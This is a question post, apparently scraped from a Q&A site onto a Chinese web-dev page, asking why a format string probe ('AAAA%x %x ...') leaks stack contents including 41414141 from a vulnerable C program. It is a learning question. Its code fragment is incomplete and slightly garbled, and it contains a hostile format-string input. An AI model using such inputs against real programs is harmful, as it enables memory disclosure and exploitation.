I came across this code showing format string exploitation while reading [this] article.
char secret="hack.se is lame";
printf("secret = %pn",&secret);
Executing it with following input
secret = 0xbffffc68
AAAA%x %x %x %x %x %x %x //Input given
AAAA4013fe20 0 0 0 41414141 33313034 30326566
What I understand till now is the sequence of `%x`'s will keep on printing the values at addresses above current `%esp` (I'm assuming that stack is growing downwards towards lower address).
What I'm unable to understand is the input given is stored in `buffer` array which can't be less than 512 bytes away from current `%esp`. So, how can the output contain `41414141` (the hex representation of `AAAA`) just after the 4 `%x`, i.e, just above the 4 addresses of current `%esp`. I tried hard to stare at assembly code too but I think I couldn't follow the manipulation of strings on stack.
以上就是Unable to understand a format string exploitation code的详细内容，更多请关注web前端其它相关文章！